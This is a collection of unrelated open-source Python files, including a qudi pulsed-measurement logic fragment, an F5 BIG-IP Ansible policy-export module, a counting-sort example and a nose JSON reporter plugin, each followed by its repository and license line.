# invoke measurement parameters from asset object
# if invoke_settings:
# # get asset object
# asset_obj = self._generator_logic.get_saved_asset(asset_name)
# # Set proper activation config
# activation_config = asset_obj.activation_config
# config_name = None
# avail_configs = self._measurement_logic.get_pulser_constraints()['activation_config']
# for config in avail_configs:
# if activation_config == avail_configs[config]:
# config_name = config
# break
#
#
# # set proper number of laser pulses
# if self._measurement_logic.number_of_lasers != asset_obj.number_of_lasers:
# self.num_laserpulses_changed(asset_obj.number_of_lasers)
# # set proper sequence length
# self._measurement_logic.sequence_length_s = asset_obj.length_bins / asset_obj.sample_rate
# self.pulse_generator_settings_changed(asset_obj.sample_rate, config_name, amplitude_dict, None)
# self.measurement_sequence_settings_changed(asset_obj.measurement_ticks_list, sequence_length, laser_ignore_list, alternating, laser_trigger_delay)
self.status_dict['loading_busy'] = True
self.sigLoadAsset.emit(asset_name, load_dict)
return
def loaded_asset_updated(self, asset_name):
"""
@param asset_name:
@return:
"""
if asset_name is not None:
asset_object = self._generator_logic.get_saved_asset(asset_name)
asset_type = type(asset_object).__name__
else:
asset_type = 'No asset loaded'
self.log.debug('PULSEDMASTER: Asset "{0}" of type "{1}" loaded into pulser channel(s)!'.format(asset_name, asset_type))
self.status_dict['sauplo_busy'] = False
self.status_dict['loading_busy'] = False
self.sigLoadedAssetUpdated.emit(asset_name, asset_type)
return asset_name, asset_type
def laser_to_show_changed(self, laser_pulse_index, get_raw_pulse):
"""
@param laser_pulse_index:
@param get_raw_pulse:
@return:
"""
self.sigLaserToShowChanged.emit(laser_pulse_index, get_raw_pulse)
return
def laser_to_show_updated(self, laser_pulse_index, get_raw_pulse):
"""
@param laser_pulse_index:
@param get_raw_pulse:
@return:
"""
self.sigLaserToShowUpdated.emit(laser_pulse_index, get_raw_pulse)
return
def laser_data_updated(self, laser_data_x, laser_data_y):
"""
@param laser_data_x:
@param laser_data_y:
@return:
"""
self.sigLaserDataUpdated.emit(laser_data_x, laser_data_y)
return
def signal_data_updated(self, signal_data_x, signal_data_y, signal_data_y2, error_data_y, error_data_y2):
"""
@param signal_data_x:
@param signal_data_y:
@param signal_data_y2:
@param error_data_y:
@param error_data_y2:
@return:
"""
self.sigSignalDataUpdated.emit(signal_data_x, signal_data_y, signal_data_y2, error_data_y, error_data_y2)
return
def analysis_method_changed(self, gaussfilt_std_dev):
"""
@param gaussfilt_std_dev:
@return:
"""
self.sigAnalysisMethodChanged.emit(gaussfilt_std_dev)
return
def analysis_method_updated(self, gaussfilt_std_dev):
"""
@param gaussfilt_std_dev:
@return:
"""
self.sigAnalysisMethodUpdated.emit(gaussfilt_std_dev)
return
#######################################################################
### Sequence generator methods ###
#######################################################################
def request_generator_init_values(self):
"""
@return:
"""
self.sigRequestGeneratorInitValues.emit()
return
def save_pulse_block(self, block_name, block_object):
"""
@param block_name:
@param block_object:
@return:
"""
self.sigSavePulseBlock.emit(block_name, block_object)
return
def save_block_ensemble(self, ensemble_name, ensemble_object):
"""
@param ensemble_name:
@param ensemble_object:
@return:
"""
# add non-crucial parameters. Metadata for pulser settings upon load into channels.
ensemble_object.sample_rate = self._generator_logic.sample_rate
ensemble_object.activation_config = self._generator_logic.activation_config
ensemble_object.amplitude_dict = self._generator_logic.amplitude_dict
ensemble_object.laser_channel = self._generator_logic.laser_channel
self.sigSaveBlockEnsemble.emit(ensemble_name, ensemble_object)
return
def save_sequence(self, sequence_name, sequence_object):
"""
@param sequence_name:
@param sequence_object:
@return:
"""
sequence_object.sample_rate = self._generator_logic.sample_rate
sequence_object.activation_config = self._generator_logic.activation_config
sequence_object.amplitude_dict = self._generator_logic.amplitude_dict
sequence_object.laser_channel = self._generator_logic.laser_channel
self.sigSaveSequence.emit(sequence_name, sequence_object)
return
def load_pulse_block(self, block_name):
"""
@param block_name:
@return:
"""
self.sigLoadPulseBlock.emit(block_name)
return
def load_block_ensemble(self, ensemble_name):
"""
@param ensemble_name:
@return:
"""
self.sigLoadBlockEnsemble.emit(ensemble_name)
return
def load_sequence(self, sequence_name):
"""
@param sequence_name:
@return:
"""
self.sigLoadSequence.emit(sequence_name)
return
def current_pulse_block_updated(self, block_object):
"""
@param block_object:
@return:
"""
self.sigCurrentPulseBlockUpdated.emit(block_object)
return
def current_block_ensemble_updated(self, ensemble_object):
"""
@param ensemble_object:
@return:
"""
self.sigCurrentBlockEnsembleUpdated.emit(ensemble_object)
return
def current_sequence_updated(self, sequence_object):
"""
@param sequence_object:
@return:
"""
self.sigCurrentSequenceUpdated.emit(sequence_object)
return
def delete_pulse_block(self, block_name):
"""
@param block_name:
@return:
"""
self.sigDeletePulseBlock.emit(block_name)
return
def delete_block_ensemble(self, ensemble_name):
"""
@param ensemble_name:
@return:
"""
self.sigDeleteBlockEnsemble.emit(ensemble_name)
return
def delete_sequence(self, sequence_name):
"""
@param sequence_name:
@return:
"""
self.sigDeleteSequence.emit(sequence_name)
return
def saved_pulse_blocks_updated(self, block_dict):
"""
@param block_dict:
@return:
"""
self.sigSavedPulseBlocksUpdated.emit(block_dict)
return
def saved_block_ensembles_updated(self, ensemble_dict):
"""
@param ensemble_dict:
@return:
"""
self.sigSavedBlockEnsemblesUpdated.emit(ensemble_dict)
return
def saved_sequences_updated(self, sequence_dict):
"""
@param sequence_dict:
@return:
"""
self.sigSavedSequencesUpdated.emit(sequence_dict)
return
def sample_block_ensemble(self, ensemble_name, write_to_file, write_chunkwise, sample_upload_load = False):
"""
@param ensemble_name:
@return:
"""
if sample_upload_load:
self.status_dict['sauplo_busy'] = True
self.status_dict['sampling_busy'] = True
self.sigSampleBlockEnsemble.emit(ensemble_name, write_to_file, write_chunkwise)
return
def sample_sequence(self, sequence_name, write_to_file, write_chunkwise, sample_upload_load = False):
"""
@param sequence_name:
@return:
"""
if sample_upload_load:
self.status_dict['sauplo_busy'] = True
self.status_dict['sampling_busy'] = True
self.sigSampleSequence.emit(sequence_name, write_to_file, write_chunkwise)
return
def sample_ensemble_finished(self, ensemble_name):
"""
@return:
"""
if self.status_dict['sauplo_busy']:
self.upload_asset(ensemble_name)
self.log.debug('PULSEDMASTER: Sampling of ensemble "{0}" finished!'.format(ensemble_name))
self.status_dict['sampling_busy'] = False
self.sigBlockEnsembleSampled.emit(ensemble_name)
return
def sample_sequence_finished(self, sequence_name):
"""
@return:
"""
if self.status_dict['sauplo_busy']:
self.upload_asset(sequence_name)
self.log.debug('PULSEDMASTER: Sampling of sequence "{0}" finished!'.format(sequence_name))
self.status_dict['sampling_busy'] = False
self.sigSequenceSampled.emit(sequence_name)
return
def generator_settings_changed(self, activation_config_name, laser_channel, sample_rate,
amplitude_dict):
"""
@param activation_config_name:
@param laser_channel:
@param sample_rate:
@param amplitude_dict:
@return:
"""
# get pulser constraints
pulser_constraints = self._measurement_logic.get_pulser_constraints()
# activation config
config_constraint = pulser_constraints['activation_config']
if activation_config_name not in config_constraint:
new_config_name = list(config_constraint.keys())[0]
self.log.warning('Activation config "{0}" could not be found in pulser constraints. '
'Choosing first valid config "{1}" '
'instead.'.format(activation_config_name, new_config_name))
activation_config_name = new_config_name
activation_config = config_constraint[activation_config_name]
# laser channel
if laser_channel not in activation_config:
old_laser_chnl = laser_channel
laser_channel = None
for chnl in activation_config:
if chnl.startswith('d_ch'):
laser_channel = chnl
break
if laser_channel is None:
for chnl in activation_config:
if chnl.startswith('a_ch'):
laser_channel = chnl
break
self.log.warning('Laser channel "{0}" could not be found in generator activation '
'config "{1}". Using first valid channel "{2}" instead.'
''.format(old_laser_chnl, activation_config, laser_channel))
# sample rate
samplerate_constraint = pulser_constraints['sample_rate']
if sample_rate < samplerate_constraint['min'] or sample_rate > samplerate_constraint['max']:
self.log.warning('Sample rate of {0} MHz lies not within pulse generator constraints. '
'Using max. allowed sample rate of {1} MHz instead.'
''.format(sample_rate, samplerate_constraint['max']))
sample_rate = samplerate_constraint['max']
# amplitude dictionary
# FIXME: check with pulser constraints
self.sigGeneratorSettingsChanged.emit(activation_config, laser_channel, sample_rate,
amplitude_dict)
return
def generator_settings_updated(self, activation_config, laser_channel, sample_rate,
amplitude_dict):
"""
@param activation_config:
@param sample_rate:
@param amplitude_dict:
@param laser_channel:
@return:
"""
# retrieve hardware constraints
pulser_constraints = self._measurement_logic.get_pulser_constraints()
# check activation_config
config_dict = pulser_constraints['activation_config']
activation_config_name = ''
for key in config_dict.keys():
if config_dict[key] == activation_config:
activation_config_name = key
if activation_config_name == '':
activation_config_name = list(config_dict.keys())[0]
activation_config = config_dict[activation_config_name]
self.log.warning('Activation config "{0}" could not be found in pulser constraints. '
'Taking first valid config "{1}" '
'instead.'.format(activation_config, activation_config_name))
self.generator_settings_changed(activation_config_name, laser_channel, sample_rate,
amplitude_dict)
else:
self.sigGeneratorSettingsUpdated.emit(activation_config_name, activation_config,
sample_rate, amplitude_dict, laser_channel)
return
def generate_predefined_sequence(self, generator_method_name, arg_list):
"""
@param generator_method_name:
@param arg_list:
@return:
"""
self.sigGeneratePredefinedSequence.emit(generator_method_name, arg_list)
return
def predefined_sequence_generated(self, generator_method_name):
"""
@param generator_method_name:
@return:
"""
self.sigPredefinedSequenceGenerated.emit(generator_method_name)
return
def predefined_sequences_updated(self, generator_methods_dict):
"""
@param generator_methods_dict:
@return:
"""
self.sigPredefinedSequencesUpdated.emit(generator_methods_dict)
return
| drogenlied/qudi | logic/pulsed_master_logic.py | Python | gpl-3.0 | 45,610 |
"""Treadmill docker authz REST api.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import http.client
import flask
import flask_restplus as restplus
_URL = 'AuthZPlugin.AuthZRes'
def init(api, cors, impl):
"""Configures REST handlers for docker authz resource."""
del cors
namespace = api.namespace(
_URL, description='Docker authz plugin authz response call'
)
# authz plugin does not accept tailing '/'
@namespace.route('')
class _Authz(restplus.Resource):
"""Treadmill App monitor resource"""
def post(self):
"""Returns list of configured app monitors."""
status = http.client.OK
payload = flask.request.get_json(force=True)
(allow, msg) = impl.authzres(payload)
return flask.Response(
json.dumps({'allow': allow, 'msg': msg}),
status=status,
mimetype='application/json'
)
# return URL explicitly because there is '.' in URL
return _URL
| Morgan-Stanley/treadmill | lib/python/treadmill/rest/api/docker_authz/authzres.py | Python | apache-2.0 | 1,151 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_asm_policy_fetch
short_description: Exports the asm policy from remote nodes.
description:
- Exports the asm policy from remote nodes.
version_added: 2.8
options:
name:
description:
- The name of the policy exported to create a file on the remote device for downloading.
required: True
dest:
description:
- A directory to save the policy file into.
- This option is ignored when C(inline) is set to c(yes).
type: path
file:
description:
- The name of the file to be create on the remote device for downloading.
- When C(binary) is set to C(no) the ASM policy will be in XML format.
inline:
description:
- If C(yes), the ASM policy will be exported C(inline) as a string instead of a file.
- The policy can be be retrieved in playbook C(result) dictionary under C(inline_policy) key.
type: bool
compact:
description:
- If C(yes), only the ASM policy custom settings will be exported.
- Only applies to XML type ASM policy exports.
type: bool
base64:
description:
- If C(yes), the returned C(inline) ASM policy content will be Base64 encoded.
- Only applies to C(inline) ASM policy exports.
type: bool
binary:
description:
- If C(yes), the exported ASM policy will be in binary format.
- Only applies to C(file) ASM policy exports.
type: bool
force:
description:
- If C(no), the file will only be transferred if it does not exist in the the destination.
default: yes
type: bool
partition:
description:
- Device partition which contains ASM policy to export.
default: Common
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Export policy in binary format
bigip_asm_policy_fetch:
name: foobar
file: export_foo
dest: /root/download
binary: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy inline base64 encoded format
bigip_asm_policy_fetch:
name: foobar
inline: yes
base64: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy in XML format
bigip_asm_policy_fetch:
name: foobar
file: export_foo
dest: /root/download
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export compact policy in XML format
bigip_asm_policy_fetch:
name: foobar
file: export_foo.xml
dest: /root/download/
compact: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy in binary format, autogenerate name
bigip_asm_policy_fetch:
name: foobar
dest: /root/download/
binary: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
name:
description: Name of the ASM policy to be exported.
returned: changed
type: str
sample: Asm_APP1_Transparent
dest:
description: Local path to download exported ASM policy.
returned: changed
type: str
sample: /root/downloads/foobar.xml
file:
description:
- Name of the policy file on the remote BIG-IP to download. If not
specified, then this will be a randomly generated filename.
returned: changed
type: str
sample: foobar.xml
inline:
description: Set when ASM policy to be exported inline
returned: changed
type: bool
sample: yes
compact:
description: Set only to export custom ASM policy settings.
returned: changed
type: bool
sample: no
base64:
description: Set to encode inline export in base64 format.
returned: changed
type: bool
sample: no
binary:
description: Set to export ASM policy in binary format.
returned: changed
type: bool
sample: yes
'''
import os
import time
import tempfile
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.icontrol import download_file
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.icontrol import download_file
from ansible.module_utils.network.f5.icontrol import module_provisioned
class Parameters(AnsibleF5Parameters):
api_map = {
'filename': 'file',
'minimal': 'compact',
'isBase64': 'base64',
}
api_attributes = [
'inline',
'minimal',
'isBase64',
'policyReference',
'filename',
]
returnables = [
'file',
'compact',
'base64',
'inline',
'force',
'binary',
'dest',
'name',
'inline_policy',
]
updatables = [
]
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
def _policy_exists(self):
uri = 'https://{0}:{1}/mgmt/tm/asm/policies/'.format(
self.client.provider['server'],
self.client.provider['server_port'],
)
query = "?$filter=contains(name,'{0}')+and+contains(partition,'{1}')&$select=name,partition".format(
self.want.name, self.want.partition
)
resp = self.client.api.get(uri + query)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'items' in response and response['items'] != []:
return True
return False
@property
def name(self):
if self._policy_exists():
return self._values['name']
else:
raise F5ModuleError(
"The specified ASM policy {0} on partition {1} does not exist on device.".format(
self._values['name'], self._values['partition']
)
)
@property
def file(self):
if self._values['file'] is not None:
return self._values['file']
if self.binary:
result = next(tempfile._get_candidate_names()) + '.plc'
else:
result = next(tempfile._get_candidate_names()) + '.xml'
self._values['file'] = result
return result
@property
def fulldest(self):
result = None
if os.path.isdir(self.dest):
result = os.path.join(self.dest, self.file)
else:
if os.path.exists(os.path.dirname(self.dest)):
result = self.dest
else:
try:
# os.path.exists() can return false in some
# circumstances where the directory does not have
# the execute bit for the current user set, in
# which case the stat() call will raise an OSError
os.stat(os.path.dirname(result))
except OSError as e:
if "permission denied" in str(e).lower():
raise F5ModuleError(
"Destination directory {0} is not accessible".format(os.path.dirname(result))
)
raise F5ModuleError(
"Destination directory {0} does not exist".format(os.path.dirname(result))
)
if not os.access(os.path.dirname(result), os.W_OK):
raise F5ModuleError(
"Destination {0} not writable".format(os.path.dirname(result))
)
return result
@property
def inline(self):
result = flatten_boolean(self._values['inline'])
if result == 'yes':
return True
elif result == 'no':
return False
@property
def compact(self):
result = flatten_boolean(self._values['compact'])
if result == 'yes':
return True
elif result == 'no':
return False
@property
def base64(self):
result = flatten_boolean(self._values['base64'])
if result == 'yes':
return True
elif result == 'no':
return False
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
pass
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def exec_module(self):
if not module_provisioned(self.client, 'asm'):
raise F5ModuleError(
"ASM must be provisioned to use this module."
)
result = dict()
self.export()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=True))
return result
def export(self):
if self.exists():
return self.update()
else:
return self.create()
def update(self):
if not self.want.force:
raise F5ModuleError(
"File '{0}' already exists.".format(self.want.fulldest)
)
self.execute()
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
if self.want.binary:
self.export_binary()
return True
self.create_on_device()
if not self.want.inline:
self.execute()
return True
def export_binary(self):
self.export_binary_on_device()
self.execute()
return True
def download(self):
self.download_from_device(self.want.fulldest)
if os.path.exists(self.want.fulldest):
return True
raise F5ModuleError(
"Failed to download the remote file."
)
def execute(self):
self.download()
self.remove_temp_policy_from_device()
return True
def exists(self):
if not self.want.inline:
if os.path.exists(self.want.fulldest):
return True
return False
def create_on_device(self):
self._set_policy_link()
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/asm/tasks/export-policy/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
result, output = self.wait_for_task(response['id'])
if result and output:
if 'file' in output:
self.changes.update(dict(inline_policy=output['file']))
if result:
return True
def wait_for_task(self, task_id):
uri = "https://{0}:{1}/mgmt/tm/asm/tasks/export-policy/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
task_id
)
while True:
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
if response['status'] in ['COMPLETED', 'FAILURE']:
break
time.sleep(1)
if response['status'] == 'FAILURE':
raise F5ModuleError(
'Failed to export ASM policy.'
)
if response['status'] == 'COMPLETED':
if not self.want.inline:
return True, None
else:
return True, response['result']
def _set_policy_link(self):
policy_link = None
uri = 'https://{0}:{1}/mgmt/tm/asm/policies/'.format(
self.client.provider['server'],
self.client.provider['server_port'],
)
query = "?$filter=contains(name,'{0}')+and+contains(partition,'{1}')&$select=name,partition".format(
self.want.name, self.want.partition
)
resp = self.client.api.get(uri + query)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'items' in response and response['items'] != []:
policy_link = response['items'][0]['selfLink']
if not policy_link:
raise F5ModuleError("The policy was not found")
self.changes.update(dict(policyReference={'link': policy_link}))
return True
def export_binary_on_device(self):
full_name = fq_name(self.want.partition, self.want.name)
cmd = 'tmsh save asm policy {0} bin-file {1}'.format(full_name, self.want.file)
uri = "https://{0}:{1}/mgmt/tm/util/bash/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
args = dict(
command='run',
utilCmdArgs='-c "{0}"'.format(cmd)
)
resp = self.client.api.post(uri, json=args)
try:
response = resp.json()
if 'commandResult' in response:
if 'Unexpected Error' in response['commandResult']:
raise F5ModuleError(response['commandResult'])
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
self._move_binary_to_download()
return True
def _move_binary_to_download(self):
name = '{0}~{1}'.format(self.client.provider['user'], self.want.file)
move_path = '/var/tmp/{0} {1}/{2}'.format(
self.want.file,
'/ts/var/rest',
name
)
params = dict(
command='run',
utilCmdArgs=move_path
)
uri = "https://{0}:{1}/mgmt/tm/util/unix-mv/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
if 'commandResult' in response:
if 'cannot stat' in response['commandResult']:
raise F5ModuleError(response['commandResult'])
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 403]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return True
def download_from_device(self, dest):
url = 'https://{0}:{1}/mgmt/tm/asm/file-transfer/downloads/{2}'.format(
self.client.provider['server'],
self.client.provider['server_port'],
self.want.file
)
try:
download_file(self.client, url, dest)
except F5ModuleError:
raise F5ModuleError(
"Failed to download the file."
)
if os.path.exists(self.want.dest):
return True
return False
def remove_temp_policy_from_device(self):
name = '{0}~{1}'.format(self.client.provider['user'], self.want.file)
tpath_name = '/ts/var/rest/{0}'.format(name)
uri = "https://{0}:{1}/mgmt/tm/util/unix-rm/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
args = dict(
command='run',
utilCmdArgs=tpath_name
)
resp = self.client.api.post(uri, json=args)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(
required=True,
),
dest=dict(
type='path'
),
file=dict(),
inline=dict(
type='bool'
),
compact=dict(
type='bool'
),
base64=dict(
type='bool'
),
binary=dict(
type='bool'
),
force=dict(
default='yes',
type='bool'
),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
self.mutually_exclusive = [
['binary', 'inline'],
['binary', 'compact'],
['dest', 'inline'],
['file', 'inline']
]
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
mutually_exclusive=spec.mutually_exclusive,
)
client = F5RestClient(**module.params)
try:
mm = ModuleManager(module=module, client=client)
results = mm.exec_module()
cleanup_tokens(client)
exit_json(module, results, client)
except F5ModuleError as ex:
cleanup_tokens(client)
fail_json(module, ex, client)
if __name__ == '__main__':
main()
| gregdek/ansible | lib/ansible/modules/network/f5/bigip_asm_policy_fetch.py | Python | gpl-3.0 | 21,007 |
from __future__ import absolute_import, division, print_function, unicode_literals
from aspen import renderers
class Renderer(renderers.Renderer):
def render_content(self, context):
return eval(self.compiled, globals(), context)
class Factory(renderers.Factory):
Renderer = Renderer
| eXcomm/gratipay.com | gratipay/renderers/eval_.py | Python | cc0-1.0 | 303 |
"""
Demo6 GameState
"""
import RoguePy.State.GameState as GameState
from RoguePy.Input import Keys
from RoguePy.UI import Elements
from RoguePy.libtcod import libtcod
class Demo6(GameState):
def __init__(self, name, manager):
super(self.__class__, self).__init__(name, manager)
def beforeLoad(self):
self._setupView()
self._setupInputs()
def updateUi(self):
self.dialVal.clear()
self.dialVal.setLabel(str(self.dial.getVal()))
###
# Initialisation
###
def _setupView(self):
frame = Elements.Frame(0, 0, self.view.width, self.view.height)
frame.setTitle("The Dial Element")
self.view.addElement(frame)
frame.addElement(Elements.Label(3, frame.height - 1, "ESC - Quit"))
frame.addElement(Elements.Label(35, frame.height - 1, "Spc - Next"))
self.dial = frame.addElement(Elements.Dial(1, 1))
self.dialVal = frame.addElement(Elements.Label(1, 8, str(self.dial.getVal()), 7))
def _setupInputs(self):
self.view.setKeyInputs({
'quit': {
'key': Keys.Escape,
'ch': None,
'fn': self.quit
},
'step': {
'key': Keys.Space,
'ch': None,
'fn': self.next
}
})
def leftClick(mouse):
charSize = libtcod.sys_get_char_size()
print "Left!"
print mouse.x / charSize[0], mouse.y / charSize[1]
def rightClick(mouse):
charSize = libtcod.sys_get_char_size()
print "Left!"
print mouse.x / charSize[0], mouse.y / charSize[1]
self.view.setMouseInputs({
'rClick': rightClick,
'lClick': leftClick
})
self.dial.setKeyInputs({
'left': {
'key': Keys.Left,
'ch': None,
'fn': self.ccw
},
'right': {
'key': Keys.Right,
'ch': None,
'fn': self.cw
}
})
###
# Input callbacks
###
def next(self):
self.manager.setNextState('demo1')
def quit(self):
self.manager.setNextState('quit')
def cw(self):
self.dial.add(11.25)
self.updateUi()
def ccw(self):
self.dial.sub(11.25)
self.updateUi()
| v4nz666/7drl2017 | RoguePy/Demo/GameStates/Demo6.py | Python | gpl-3.0 | 2,409 |
#!/usr/bin/env python3
import nikola.nikola
import os.path
import glob
used = []
exist = []
for tr in nikola.nikola.LEGAL_VALUES['TRANSLATIONS']:
if isinstance(tr, tuple):
used.append(tr[0])
used.append(tr)
for file in glob.glob(os.path.join('nikola', 'data', 'themes', 'base',
'messages', 'messages_*.py')):
lang = file.split('_', 1)[1][:-3]
exist.append(lang)
if lang in used:
print('{0}: found'.format(lang))
elif os.path.islink(file):
print('\x1b[1;1m\x1b[1;30m{0}: symlink\x1b[0m'.format(lang))
else:
print('\x1b[1;1m\x1b[1;31m{0}: NOT found\x1b[0m'.format(lang))
| gwax/nikola | scripts/langstatus.py | Python | mit | 666 |
# Part of Cosmos by OpenGenus Foundation
# Python program for counting sort
# The main function that sort the given string arr[] in
# alphabetical order
def countSort(arr):
# The output character array that will have sorted arr
output = [0 for i in range(256)]
# Create a count array to store count of inidividul
# characters and initialize count array as 0
count = [0 for i in range(256)]
# For storing the resulting answer since the
# string is immutable
ans = ["" for _ in arr]
# Store count of each character
for i in arr:
count[ord(i)] += 1
# Change count[i] so that count[i] now contains actual
# position of this character in output array
for i in range(256):
count[i] += count[i-1]
# Build the output character array
for i in range(len(arr)):
output[count[ord(arr[i])]-1] = arr[i]
count[ord(arr[i])] -= 1
# Copy the output array to arr, so that arr now
# contains sorted characters
for i in range(len(arr)):
ans[i] = output[i]
return ans
# Driver program to test above function
arr = "opengenus"
ans = countSort(arr)
print "Sorted character array is %s" %("".join(ans))
| Jecoms/cosmos | code/sorting/counting_sort/countsort.py | Python | gpl-3.0 | 1,216 |
import logging
import os
import sys
import codecs
import json
from time import time
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from nose.plugins import Plugin
from nose.plugins.xunit import id_split, nice_classname, format_exception, exc_message, Tee
from nose.exc import SkipTest
from nose.pyversion import UNICODE_STRINGS
log = logging.getLogger('nose.plugins.lode_json_reporter')
class LodeJsonReporter(Plugin):
name = 'lodejson'
encoding = 'UTF-8'
report_file = None
def __init__(self):
super(LodeJsonReporter, self).__init__()
self._capture_stack = []
self._currentStdout = None
self._currentStderr = None
def options(self, parser, env=os.environ):
"""Sets additional command line options."""
Plugin.options(self, parser, env)
parser.add_option(
'--lode-report', action='store',
dest='lode_report', metavar="FILE",
default=env.get('LODE_REPORT_FILE', 'lode-report.json'),
help=("Path to xml file to store the lode report in. "
"Default is lode-report.xml in the working directory "
"[LODE_REPORT_FILE]"))
def configure(self, options, config):
super(LodeJsonReporter, self).configure(options, config)
self.config = config
if self.enabled:
self.stats = {
'errors': 0,
'failures': 0,
'passes': 0,
'skipped': 0
}
self.testcases = []
self.report_file = codecs.open(
options.lode_report, 'w', self.encoding, 'replace'
)
def _timeTaken(self):
if hasattr(self, '_timer'):
taken = time() - self._timer
else:
# test died before it ran (probably error in setup())
# or success/failure added before test started probably
# due to custom TestResult munging
taken = 0.0
return taken
def report(self, stream):
self.stats['total'] = (self.stats['errors'] + self.stats['failures']
+ self.stats['passes'] + self.stats['skipped'])
report = dict()
report['encoding'] = self.encoding
report['stats'] = self.stats
report['testcases'] = [testcase for testcase in self.testcases]
self.report_file.write(json.dumps(report))
self.report_file.close()
def _startCapture(self):
self._capture_stack.append((sys.stdout, sys.stderr))
self._currentStdout = StringIO()
self._currentStderr = StringIO()
sys.stdout = Tee(self._currentStdout, sys.stdout)
sys.stderr = Tee(self._currentStderr, sys.stderr)
def startContext(self, context):
self._startCapture()
def beforeTest(self, test):
test.test_actions = list()
self._timer = time()
self._startCapture()
def _endCapture(self):
if self._capture_stack:
sys.stdout, sys.stderr = self._capture_stack.pop()
def afterTest(self, test):
self._endCapture()
self._currentStdout = None
self._currentStderr = None
def finalize(self, test):
while self._capture_stack:
self._endCapture()
def _getCapturedStdout(self):
if self._currentStdout:
value = self._currentStdout.getvalue()
if value:
return value
return ''
def _getCapturedStderr(self):
if self._currentStderr:
value = self._currentStderr.getvalue()
if value:
return value
return ''
def form_test_report(self, test, err=None, status=None):
time = self._timeTaken()
id = test.id()
actions = test.test_actions
priority = test.priority
if not status:
status = 'success'
report = {
'classname': id_split(id)[0],
'name': id_split(id)[-1],
'actions': actions,
'time': time,
'status': status,
